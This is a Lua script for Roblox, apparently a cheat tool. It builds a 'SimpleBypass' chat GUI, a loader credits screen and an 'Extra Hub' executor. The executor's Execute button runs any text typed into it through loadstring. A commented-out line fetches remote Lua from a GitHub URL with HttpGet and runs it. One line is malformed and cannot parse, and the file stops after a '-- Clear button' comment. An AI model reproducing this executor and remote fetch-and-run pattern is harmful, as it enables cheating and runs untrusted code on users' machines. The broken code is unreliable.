local function initui()
	-- Instances: 29 | Scripts: 0 | Modules: 0
	local G2L = {};

	-- StarterGui.SimpleBypass
	G2L["1"] = Instance.new("ScreenGui", game:GetService("CoreGui"));
	G2L["1"]["Name"] = [[Extra"]];

	-- StarterGui.SimpleBypass.UI
	G2L["2"] = Instance.new("Frame", G2L["1"]);
	G2L["2"]["BorderSizePixel"] = 0;
	G2L["2"]["BackgroundColor3"] = Color3.fromRGB(27, 27, 27);
	G2L["2"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
	G2L["2"]["Size"] = UDim2.new(0, 47, 0, 83);
	G2L["2"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
	G2L["2"]["Position"] = UDim2.new(0.10000000149011612, 0, 0.49300000071525574, 0);
	G2L["2"]["Name"] = [[UI]];

	-- StarterGui.SimpleBypass.UI.UICorner
	G2L["3"] = Instance.new("UICorner", G2L["2"]);
	G2L["3"]["CornerRadius"] = UDim.new(0, 17);

	-- StarterGui.SimpleBypass.UI.UIStroke
	G2L["4"] = Instance.new("UIStroke", G2L["2"]);
	G2L["4"]["Color"] = Color3.fromRGB(255, 255, 255);
	G2L["4"]["Thickness"] = 4;
	G2L["4"]["Transparency"] = 0.800000011920929;

	-- StarterGui.SimpleBypass.UI.logo
	G2L["5"] = Instance.new("ImageLabel", G2L["2"]);
	G2L["5"]["BorderSizePixel"] = 0;
	G2L["5"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
	G2L["5"]["AnchorPoint"] = Vector2.new(0.5, 0);
	G2L["5"]["Image"] = [[rbxassetid://18481362660]];
	G2L["5"]["Size"] = UDim2.new(0, 27, 0, 27);
	G2L["5"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
	G2L["5"]["Name"] = [[logo]];
	G2L["5"]["BackgroundTransparency"] = 1;
	G2L["5"]["Position"] = UDim2.new(0.5, 0, 0, 10);

	-- StarterGui.SimpleBypass.UI.maximize
	G2L["6"] = Instance.new("ImageButton", G2L["2"]);
	G2L["6"]["BorderSizePixel"] = 0;
	G2L["6"]["AutoButtonColor"] = false;
	G2L["6"]["BackgroundColor3"] = Color3.fromRGB(27, 27, 27);
	G2L["6"]["AnchorPoint"] = Vector2.new(0.5, 0);
	G2L["6"]["Size"] = UDim2.new(0, 37, 0, 37);
	G2L["6"]["Name"] = [[maximize]];
	G2L["6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
	G2L["6"]["Position"] = UDim2.new(0.5, 0, 1, -42);

	-- StarterGui.SimpleBypass.UI.maximize.UICorner
	G2L["7"] = Instance.new("UICorner", G2L["6"]);
	G2L["7"]["CornerRadius"] = UDim.new(1, 0);

	-- StarterGui.SimpleBypass.UI.maximize.ImageLabel
	G2L["8"] = Instance.new("ImageLabel", G2L["6"]);
	G2L["8"]["BorderSizePixel"] = 0;
	G2L["8"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
	G2L["8"]["ImageColor3"] = Color3.fromRGB(171, 171, 171);
	G2L["8"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
	G2L["8"]["Image"] = [[rbxassetid://7072718683]];
	G2L["8"]["Size"] = UDim2.new(0.5, 0, 0.5, 0);
	G2L["8"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
	G2L["8"]["BackgroundTransparency"] = 1;
	G2L["8"]["Position"] = UDim2.new(0.5, 0, 0.5, 0);

	-- StarterGui.SimpleBypass.UI.upperbar
	G2L["a"] = Instance.new("Frame", G2L["2"]);
	G2L["a"]["BorderSizePixel"] = 0;
	G2L["a"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
	G2L["a"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
	G2L["a"]["BackgroundTransparency"] = 1;
	G2L["a"]["Size"] = UDim2.new(1, -30, 0, 30);
	G2L["a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
	G2L["a"]["Position"] = UDim2.new(0.5, 0, 0, 30);
	G2L["a"]["Visible"] = false;
	G2L["a"]["Name"] = [[upperbar]];

	-- StarterGui.SimpleBypass.UI.upperbar.logo
	G2L["b"] = Instance.new("ImageLabel", G2L["a"]);
	G2L["b"]["BorderSizePixel"] = 0;
	G2L["b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
	G2L["b"]["AnchorPoint"] = Vector2.new(0, 0.5);
	G2L["b"]["Image"] = [[rbxassetid://18481362660]];
	G2L["b"]["Size"] = UDim2.new(0, 30, 0, 30);
	G2L["b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
	G2L["b"]["Name"] = [[logo]];
	G2L["b"]["BackgroundTransparency"] = 1;
	G2L["b"]["Position"] = UDim2.new(0, 0, 0.5, 0);

	-- StarterGui.SimpleBypass.UI.upperbar.header
	G2L["c"] = Instance.new("TextLabel", G2L["a"]);
	G2L["c"]["BorderSizePixel"] = 0;
	G2L["c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
	G2L["c"]["TextXAlignment"] = Enum.TextXAlignment.Left;
	G2L["c"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.SemiBold, Enum.FontStyle.Normal);
	G2L["c"]["TextSize"] = 15;
	G2L["c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
	G2L["c"]["Size"] = UDim2.new(0.8493150472640991, -33, 1, 0);
	G2L["c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
	G2L["c"]["Text"] = [[SimpleBypass]];
	G2L["c"]["Name"] = [[header]];
	G2L["c"]["BackgroundTransparency"] = 1;
	G2L["c"]["Position"] = UDim2.new(0, 33, 0, 2);

	-- StarterGui.SimpleBypass.UI.upperbar.minimize
	G2L["d"] = Instance.new("ImageButton", G2L["a"]);
	G2L["d"]["BorderSizePixel"] = 0;
	G2L["d"]["AutoButtonColor"] = false;
	G2L["d"]["BackgroundColor3"] = Color3.fromRGB(27, 27, 27);
	G2L["d"]["Size"] = UDim2.new(0, 30, 0, 30);
	G2L["d"]["Name"] = [[minimize]];
	G2L["d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
	G2L["d"]["Position"] = UDim2.new(1, -30, 0, 0);

	-- StarterGui.SimpleBypass.UI.upperbar.minimize.UICorner
	G2L["e"] = Instance.new("UICorner", G2L["d"]);
	G2L["e"]["CornerRadius"] = UDim.new(0, 6);

	-- StarterGui.SimpleBypass.UI.upperbar.minimize.ImageLabel
	G2L["f"] = Instance.new("ImageLabel", G2L["d"]);
	G2L["f"]["BorderSizePixel"] = 0;
	G2L["f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
	G2L["f"]["ImageColor3"] = Color3.fromRGB(171, 171, 171);
	G2L["f"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
	G2L["f"]["Image"] = [[rbxassetid://7072719125]];
	G2L["f"]["Size"] = UDim2.new(0.6399999856948853, 0, 0.6399999856948853, 0);
	G2L["f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
	G2L["f"]["BackgroundTransparency"] = 1;
	G2L["f"]["Position"] = UDim2.new(0.5, 0, 0.5, 0);

	-- StarterGui.SimpleBypass.UI.upperbar.settings
	G2L["10"] = Instance.new("ImageButton", G2L["a"]);
	G2L["10"]["BorderSizePixel"] = 0;
	G2L["10"]["AutoButtonColor"] = false;
	G2L["10"]["BackgroundColor3"] = Color3.fromRGB(27, 27, 27);
	G2L["10"]["Size"] = UDim2.new(0, 30, 0, 30);
	G2L["10"]["Name"] = [[settings]];
	G2L["10"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
	G2L["10"]["Position"] = UDim2.new(1, -65, 0, 0);

	-- StarterGui.SimpleBypass.UI.upperbar.settings.UICorner
	G2L["11"] = Instance.new("UICorner", G2L["10"]);
	G2L["11"]["CornerRadius"] = UDim.new(0, 6);

	-- StarterGui.SimpleBypass.UI.upperbar.settings.ImageLabel
	G2L["12"] = Instance.new("ImageLabel", G2L["10"]);
	G2L["12"]["BorderSizePixel"] = 0;
	G2L["12"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
	G2L["12"]["ImageColor3"] = Color3.fromRGB(171, 171, 171);
	G2L["12"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
	G2L["12"]["Image"] = [[rbxassetid://18151015259]];
	G2L["12"]["Size"] = UDim2.new(0.6399999856948853, 0, 0.6399999856948853, 0);
	G2L["12"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
	G2L["12"]["BackgroundTransparency"] = 1;
	G2L["12"]["Position"] = UDim2.new(0.5, 0, 0.5, 0);

	-- StarterGui.SimpleBypass.UI.bar
	G2L["13"] = Instance.new("Frame", G2L["2"]);
	G2L["13"]["BorderSizePixel"] = 0;
	G2L["13"]["BackgroundColor3"] = Color3.fromRGB(32, 32, 32);
	G2L["13"]["AnchorPoint"] = Vector2.new(0.5, 0);
	G2L["13"]["Size"] = UDim2.new(1, -30, 0, 40);
	G2L["13"]["ClipsDescendants"] = true;
	G2L["13"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
	G2L["13"]["Position"] = UDim2.new(0.5, 0, 1, -50);
	G2L["13"]["AutomaticSize"] = Enum.AutomaticSize.Y;
	G2L["13"]["Visible"] = false;
	G2L["13"]["Name"] = [[bar]];

	-- StarterGui.SimpleBypass.UI.bar.UICorner
	G2L["14"] = Instance.new("UICorner", G2L["13"]);

	-- StarterGui.SimpleBypass.UI.bar.messagebox
	G2L["15"] = Instance.new("TextBox", G2L["13"]);
	G2L["15"]["PlaceholderColor3"] = Color3.fromRGB(179, 179, 179);
	G2L["15"]["BorderSizePixel"] = 0;
	G2L["15"]["TextSize"] = 15;
	G2L["15"]["TextXAlignment"] = Enum.TextXAlignment.Left;
	G2L["15"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
	G2L["15"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
	G2L["15"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.Medium, Enum.FontStyle.Normal);
	G2L["15"]["BackgroundTransparency"] = 1;
	G2L["15"]["PlaceholderText"] = [[Message here]];
	G2L["15"]["Size"] = UDim2.new(1, -82, 1, 0);
	G2L["15"]["ClipsDescendants"] = true;
	G2L["15"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
	G2L["15"]["Text"] = [[]];
	G2L["15"]["Name"] = [[messagebox]];
	G2L["15"]["ClearTextOnFocus"] = false;

	-- StarterGui.SimpleBypass.UI.bar.messagebox.UIPadding
	G2L["16"] = Instance.new("UIPadding", G2L["15"]);
	G2L["16"]["PaddingTop"] = UDim.new(0, 6);
	G2L["16"]["PaddingBottom"] = UDim.new(0, 6);
	G2L["16"]["PaddingLeft"] = UDim.new(0, 10);

	-- StarterGui.SimpleBypass.UI.bar.send
	G2L["17"] = Instance.new("ImageButton", G2L["13"]);
	G2L["17"]["BorderSizePixel"] = 0;
	G2L["17"]["AutoButtonColor"] = false;
	G2L["17"]["BackgroundColor3"] = Color3.fromRGB(32, 32, 32);
	G2L["17"]["Size"] = UDim2.new(0, 40, 0, 40);
	G2L["17"]["Name"] = [[send]];
	G2L["17"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
	G2L["17"]["Position"] = UDim2.new(1, -40, 0, 0);

	-- StarterGui.SimpleBypass.UI.bar.send.UICorner
	G2L["18"] = Instance.new("UICorner", G2L["17"]);

	-- StarterGui.SimpleBypass.UI.bar.send.Frame
	G2L["19"] = Instance.new("Frame", G2L["17"]);
	G2L["19"]["BorderSizePixel"] = 0;
	G2L["19"]["BackgroundColor3"] = Color3.fromRGB(32, 32, 32);
	G2L["19"]["Size"] = UDim2.new(0, 4, 1, 0);
	G2L["19"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);

	-- StarterGui.SimpleBypass.UI.bar.send.ImageLabel
	G2L["1a"] = Instance.new("ImageLabel", G2L["17"]);
	G2L["1a"]["BorderSizePixel"] = 0;
	G2L["1a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
	G2L["1a"]["ImageColor3"] = Color3.fromRGB(131, 131, 131);
	G2L["1a"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
	G2L["1a"]["Image"] = [[rbxassetid://18150985605]];
	G2L["1a"]["Size"] = UDim2.new(0, 20, 0, 20);
	G2L["1a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
	G2L["1a"]["BackgroundTransparency"] = 1;
	G2L["1a"]["Position"] = UDim2.new(0.5, 0, 0.5, 0);

	-- StarterGui.SimpleBypass.UI.bar.clear
	G2L["1b"] = Instance.new("ImageButton", G2L["13"]);
	G2L["1b"]["BorderSizePixel"] = 0;
	G2L["1b"]["AutoButtonColor"] = false;
	G2L["1b"]["BackgroundColor3"] = Color3.fromRGB(32, 32, 32);
	G2L["1b"]["Size"] = UDim2.new(0, 40, 0, 40);
	G2L["1b"]["Name"] = [[clear]];
	G2L["1b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
	G2L["1b"]["Position"] = UDim2.new(1, -80, 0, 0);

	-- StarterGui.SimpleBypass.UI.bar.clear.ImageLabel
	G2L["1c"] = Instance.new("ImageLabel", G2L["1b"]);
	G2L["1c"]["BorderSizePixel"] = 0;
	G2L["1c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
	G2L["1c"]["ImageColor3"] = Color3.fromRGB(131, 131, 131);
	G2L["1c"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
	G2L["1c"]["Image"] = [[rbxassetid://17746544452]];
	G2L["1c"]["Size"] = UDim2.new(0, 20, 0, 20);
	G2L["1c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
	G2L["1c"]["BackgroundTransparency"] = 1;
	G2L["1c"]["Position"] = UDim2.new(0.5, 0, 0.5, 0);
	
	return G2L["1"];
end
local function initloader()
    -- Instances: 18 | Scripts: 0 | Modules: 0
    local G2L = {};

    -- StarterGui.Loader
    G2L["1"] = Instance.new("ScreenGui", game:GetService("CoreGui"));
    G2L["1"]["IgnoreGuiInset"] = true;
    G2L["1"]["ScreenInsets"] = Enum.ScreenInsets.DeviceSafeInsets;
    G2L["1"]["Name"] = [[Loader]];
    G2L["1"]["ResetOnSpawn"] = false;

    -- StarterGui.Loader.UI
    G2L["2"] = Instance.new("Frame", G2L["1"]);
    G2L["2"]["BorderSizePixel"] = 0;
    G2L["2"]["BackgroundColor3"] = Color3.fromRGB(27, 27, 27);
    G2L["2"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
    G2L["2"]["Size"] = UDim2.new(0, 251, 0, 216);
    G2L["2"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
    G2L["2"]["Position"] = UDim2.new(0.5, 0, 0.5, 0);
    G2L["2"]["Name"] = [[UI]];

    -- StarterGui.Loader.UI.UICorner
    G2L["3"] = Instance.new("UICorner", G2L["2"]);
    G2L["3"]["CornerRadius"] = UDim.new(0, 17);

    -- StarterGui.Loader.UI.UIStroke
    G2L["4"] = Instance.new("UIStroke", G2L["2"]);
    G2L["4"]["Color"] = Color3.fromRGB(255, 255, 255);
    G2L["4"]["Thickness"] = 4;
    G2L["4"]["Transparency"] = 0.800000011920929;

    -- StarterGui.Loader.UI.upperbar
    G2L["5"] = Instance.new("Frame", G2L["2"]);
    G2L["5"]["BorderSizePixel"] = 0;
    G2L["5"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
    G2L["5"]["AnchorPoint"] = Vector2.new(0.5, 0.5);
    G2L["5"]["BackgroundTransparency"] = 1;
    G2L["5"]["Size"] = UDim2.new(1, -30, 0, 30);
    G2L["5"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
    G2L["5"]["Position"] = UDim2.new(0.5, 0, 0, 30);
    G2L["5"]["Name"] = [[upperbar]];

    -- StarterGui.Loader.UI.upperbar.logo
    G2L["6"] = Instance.new("ImageLabel", G2L["5"]);
    G2L["6"]["BorderSizePixel"] = 0;
    G2L["6"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
    G2L["6"]["AnchorPoint"] = Vector2.new(0, 0.5);
    G2L["6"]["Image"] = [[rbxassetid://18481362660]];
    G2L["6"]["Size"] = UDim2.new(0, 30, 0, 30);
    G2L["6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
    G2L["6"]["Name"] = [[logo]];
    G2L["6"]["BackgroundTransparency"] = 1;
    G2L["6"]["Position"] = UDim2.new(0, 0, 0.5, 0);

    -- StarterGui.Loader.UI.upperbar.header
    G2L["7"] = Instance.new("TextLabel", G2L["5"]);
    G2L["7"]["BorderSizePixel"] = 0;
    G2L["7"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
    G2L["7"]["TextXAlignment"] = Enum.TextXAlignment.Left;
    G2L["7"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.SemiBold, Enum.FontStyle.Normal);
    G2L["7"]["TextSize"] = 15;
    G2L["7"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
    G2L["7"]["Size"] = UDim2.new(0.8493150472640991, -33, 1, 0);
    G2L["7"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
    G2L["7"]["Text"] = [[SimpleBypass]];
    G2L["7"]["Name"] = [[header]];
    G2L["7"]["BackgroundTransparency"] = 1;
    G2L["7"]["Position"] = UDim2.new(0, 33, 0, 2);

    -- StarterGui.Loader.UI.upperbar.settings
    G2L["8"] = Instance.new("ImageButton", G2L["5"]);
    G2L["8"]["BorderSizePixel"] = 0;
    G2L["8"]["AutoButtonColor"] = false;
    G2L["8"]["BackgroundColor3"] = Color3.fromRGB(27, 27, 27);
    G2L["8"]["Size"] = UDim2.new(0, 30, 0, 30);
    G2L["8"]["Name"] = [[settings]];
    G2L["8"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
    G2L["8"]["Position"] = UDim2.new(1, -65, 0, 0);

    -- StarterGui.Loader.UI.upperbar.settings.UICorner
    G2L["9"] = Instance.new("UICorner", G2L["8"]);
    G2L["9"]["CornerRadius"] = UDim.new(0, 6);

    -- StarterGui.Loader.UI.Credits
    G2L["a"] = Instance.new("TextLabel", G2L["2"]);
    G2L["a"]["BorderSizePixel"] = 0;
    G2L["a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
    G2L["a"]["TextXAlignment"] = Enum.TextXAlignment.Left;
    G2L["a"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.SemiBold, Enum.FontStyle.Normal);
    G2L["a"]["TextSize"] = 15;
    G2L["a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
    G2L["a"]["Size"] = UDim2.new(0, 154, 0, 30);
    G2L["a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
    G2L["a"]["Text"] = [[CREDITS:]];
    G2L["a"]["Name"] = [[Credits]];
    G2L["a"]["BackgroundTransparency"] = 1;
    G2L["a"]["Position"] = UDim2.new(0, 15, 0, 50);

    -- StarterGui.Loader.UI.Skire
    G2L["b"] = Instance.new("TextLabel", G2L["2"]);
    G2L["b"]["BorderSizePixel"] = 0;
    G2L["b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
    G2L["b"]["TextXAlignment"] = Enum.TextXAlignment.Left;
    G2L["b"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.SemiBold, Enum.FontStyle.Normal);
    G2L["b"]["TextSize"] = 14;
    G2L["b"]["TextColor3"] = Color3.fromRGB(166, 166, 166);
    G2L["b"]["Size"] = UDim2.new(0, 154, 0, 30);
    G2L["b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
    G2L["b"]["Text"] = [[Skire - Only dev]];
    G2L["b"]["Name"] = [[Skire]];
    G2L["b"]["BackgroundTransparency"] = 1;
    G2L["b"]["Position"] = UDim2.new(0, 41, 0, 74);

    -- StarterGui.Loader.UI.Based
    G2L["c"] = Instance.new("TextLabel", G2L["2"]);
    G2L["c"]["BorderSizePixel"] = 0;
    G2L["c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
    G2L["c"]["TextXAlignment"] = Enum.TextXAlignment.Left;
    G2L["c"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.SemiBold, Enum.FontStyle.Normal);
    G2L["c"]["TextSize"] = 14;
    G2L["c"]["TextColor3"] = Color3.fromRGB(166, 166, 166);
    G2L["c"]["Size"] = UDim2.new(0, 154, 0, 30);
    G2L["c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
    G2L["c"]["Text"] = [[Based - No reason]];
    G2L["c"]["Name"] = [[Based]];
    G2L["c"]["BackgroundTransparency"] = 1;
    G2L["c"]["Position"] = UDim2.new(0, 41, 0, 94);

    -- StarterGui.Loader.UI.Join
    G2L["d"] = Instance.new("TextButton", G2L["2"]);
    G2L["d"]["BorderSizePixel"] = 0;
    G2L["d"]["BackgroundColor3"] = Color3.fromRGB(42, 42, 42);
    G2L["d"]["TextSize"] = 14;
    G2L["d"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.Medium, Enum.FontStyle.Normal);
    G2L["d"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
    G2L["d"]["Size"] = UDim2.new(0, 233, 0, 30);
    G2L["d"]["Name"] = [[Join]];
    G2L["d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
    G2L["d"]["Text"] = [[Join the Discord]];
    G2L["d"]["Position"] = UDim2.new(0, 9, 1, -49);

    -- StarterGui.Loader.UI.Join.UICorner
    G2L["e"] = Instance.new("UICorner", G2L["d"]);


    -- StarterGui.Loader.UI.Nevermind
    G2L["f"] = Instance.new("TextButton", G2L["2"]);
    G2L["f"]["BorderSizePixel"] = 0;
    G2L["f"]["BackgroundColor3"] = Color3.fromRGB(42, 42, 42);
    G2L["f"]["TextSize"] = 10;
    G2L["f"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.Medium, Enum.FontStyle.Normal);
    G2L["f"]["TextColor3"] = Color3.fromRGB(154, 154, 154);
    G2L["f"]["Size"] = UDim2.new(0, 233, 0, 19);
    G2L["f"]["Name"] = [[Nevermind]];
    G2L["f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
    G2L["f"]["Text"] = [[NO, I HATE YOU]];
    G2L["f"]["Position"] = UDim2.new(0, 9, 1, -19);
    G2L["f"]["BackgroundTransparency"] = 1;

    -- StarterGui.Loader.UI.Nevermind.UICorner
    G2L["10"] = Instance.new("UICorner", G2L["f"]);


    -- StarterGui.Loader.UI.YTeber
    G2L["11"] = Instance.new("TextLabel", G2L["2"]);
    G2L["11"]["BorderSizePixel"] = 0;
    G2L["11"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
    G2L["11"]["TextXAlignment"] = Enum.TextXAlignment.Left;
    G2L["11"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.SemiBold, Enum.FontStyle.Normal);
    G2L["11"]["TextSize"] = 14;
    G2L["11"]["TextColor3"] = Color3.fromRGB(166, 166, 166);
    G2L["11"]["Size"] = UDim2.new(0, 154, 0, 30);
    G2L["11"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
    G2L["11"]["Text"] = [[YTeber112 - idk]];
    G2L["11"]["Name"] = [[YTeber]];
    G2L["11"]["BackgroundTransparency"] = 1;
    G2L["11"]["Position"] = UDim2.new(0, 41, 0, 116);

    -- StarterGui.Loader.UI.Bat
    G2L["12"] = Instance.new("TextLabel", G2L["2"]);
    G2L["12"]["BorderSizePixel"] = 0;
    G2L["12"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
    G2L["12"]["TextXAlignment"] = Enum.TextXAlignment.Left;
    G2L["12"]["FontFace"] = Font.new([[rbxasset://fonts/families/GothamSSm.json]], Enum.FontWeight.SemiBold, Enum.FontStyle.Normal);
    G2L["12"]["TextSize"] = 14;
    G2L["12"]["TextColor3"] = Color3.fromRGB(166, 166, 166);
    G2L["12"]["Size"] = UDim2.new(0, 154, 0, 30);
    G2L["12"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
    G2L["12"]["Zonkey9070 cretor]];
    G2L["12"]["Name"] = [[Bat]];
    G2L["12"]["BackgroundTransparency"] = 1;
    G2L["12"]["Position"] = UDim2.new(0, 41, 0, 137);


    return G2L["1"];
end
spawn(function()
    --local discord = loadstring(game:HttpGet("https://raw.githubusercontent.com/SkireScripts/Ouxie/main/Projects/Discord%20Inviter/Loader.lua"))()
    --discord:invite("https://discord.gg/invite/jj4NC9ppSC", "Real?", function()end)
      local ScreenGui = Instance.new("ScreenGui")
local MainFrame = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local TopBar = Instance.new("Frame")
local UICorner2 = Instance.new("UICorner")
local Title = Instance.new("TextLabel")
local CloseButton = Instance.new("TextButton")
local UICorner3 = Instance.new("UICorner")

local ExecutorTab = Instance.new("Frame")
local ExecutorButton = Instance.new("TextButton")
local UICorner4 = Instance.new("UICorner")
local ExecuteButton = Instance.new("TextButton")
local ClearButton = Instance.new("TextButton")
local UICorner5 = Instance.new("UICorner")
local ScriptBox = Instance.new("TextBox")
local UICorner6 = Instance.new("UICorner")

local ScriptsTab = Instance.new("Frame")
local LalolHubButton = Instance.new("TextButton")
local ScriptsTabButton = Instance.new("TextButton")
local UICorner7 = Instance.new("UICorner")
local UICorner8 = Instance.new("UICorner")

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.Name = "ExtraHubUI"

MainFrame.Name = "MainFrame"
MainFrame.Parent = ScreenGui
MainFrame.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
MainFrame.Position = UDim2.new(0.5, -200, 0.5, -150)
MainFrame.Size = UDim2.new(0, 400, 0, 300)
MainFrame.Active = true
MainFrame.Draggable = true

UICorner.CornerRadius = UDim.new(0, 10)
UICorner.Parent = MainFrame

TopBar.Name = "TopBar"
TopBar.Parent = MainFrame
TopBar.BackgroundColor3 = Color3.fromRGB(35, 35, 35)
TopBar.Size = UDim2.new(1, 0, 0, 30)

UICorner2.CornerRadius = UDim.new(0, 10)
UICorner2.Parent = TopBar

Title.Name = "Title"
Title.Parent = TopBar
Title.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Title.BackgroundTransparency = 1
Title.Size = UDim2.new(1, -30, 1, 0)
Title.Font = Enum.Font.SourceSans
Title.Text = "Extra Hub"
Title.TextColor3 = Color3.fromRGB(255, 255, 255)
Title.TextSize = 24
Title.TextXAlignment = Enum.TextXAlignment.Left
Title.Position = UDim2.new(0, 10, 0, 0)

CloseButton.Name = "CloseButton"
CloseButton.Parent = TopBar
CloseButton.BackgroundColor3 = Color3.fromRGB(255, 50, 50)
CloseButton.Position = UDim2.new(1, -30, 0, 5)
CloseButton.Size = UDim2.new(0, 20, 0, 20)
CloseButton.Font = Enum.Font.SourceSans
CloseButton.Text = "X"
CloseButton.TextColor3 = Color3.fromRGB(255, 255, 255)
CloseButton.TextSize = 14

UICorner3.CornerRadius = UDim.new(0, 5)
UICorner3.Parent = CloseButton

CloseButton.MouseButton1Click:Connect(function()
    ScreenGui:Destroy()
end)

-- Executor Tab
ExecutorTab.Name = "ExecutorTab"
ExecutorTab.Parent = MainFrame
ExecutorTab.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
ExecutorTab.Position = UDim2.new(0, 10, 0, 40)
ExecutorTab.Size = UDim2.new(1, -20, 1, -50)
ExecutorTab.Visible = true

UICorner4.CornerRadius = UDim.new(0, 10)
UICorner4.Parent = ExecutorTab

ExecutorButton.Name = "ExecutorButton"
ExecutorButton.Parent = MainFrame
ExecutorButton.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
ExecutorButton.Position = UDim2.new(0, 10, 0, 40)
ExecutorButton.Size = UDim2.new(0, 100, 0, 30)
ExecutorButton.Font = Enum.Font.SourceSans
ExecutorButton.Text = "Executor"
ExecutorButton.TextColor3 = Color3.fromRGB(255, 255, 255)
ExecutorButton.TextSize = 18

UICorner5.CornerRadius = UDim.new(0, 10)
UICorner5.Parent = ExecutorButton

ExecutorButton.MouseButton1Click:Connect(function()
    ExecutorTab.Visible = true
    ScriptsTab.Visible = false
    ExecutorButton.Visible = false
    ScriptsTabButton.Visible = true
end)

-- Script input box
ScriptBox.Name = "ScriptBox"
ScriptBox.Parent = ExecutorTab
ScriptBox.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
ScriptBox.Position = UDim2.new(0, 10, 0, 10)
ScriptBox.Size = UDim2.new(1, -20, 0.6, -20)
ScriptBox.Font = Enum.Font.SourceSans
ScriptBox.MultiLine = true
ScriptBox.Text = ""
ScriptBox.TextColor3 = Color3.fromRGB(255, 255, 255)
ScriptBox.TextSize = 14
ScriptBox.TextWrapped = true

UICorner6.CornerRadius = UDim.new(0, 10)
UICorner6.Parent = ScriptBox

-- Execute button
ExecuteButton.Name = "ExecuteButton"
ExecuteButton.Parent = ExecutorTab
ExecuteButton.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
ExecuteButton.Position = UDim2.new(0.3, 0, 0.75, 0)
ExecuteButton.Size = UDim2.new(0.4, 0, 0.15, 0)
ExecuteButton.Font = Enum.Font.SourceSans
ExecuteButton.Text = "Execute"
ExecuteButton.TextColor3 = Color3.fromRGB(255, 255, 255)
ExecuteButton.TextSize = 18

UICorner7 = Instance.new("UICorner")
UICorner7.CornerRadius = UDim.new(0, 10)
UICorner7.Parent = ExecuteButton

ExecuteButton.MouseButton1Click:Connect(function()
    local scriptText = ScriptBox.Text
    local func = loadstring(scriptText)
    if func then
        func()
    else
        print("Failed to load script.")
    end
end)

-- Clear button
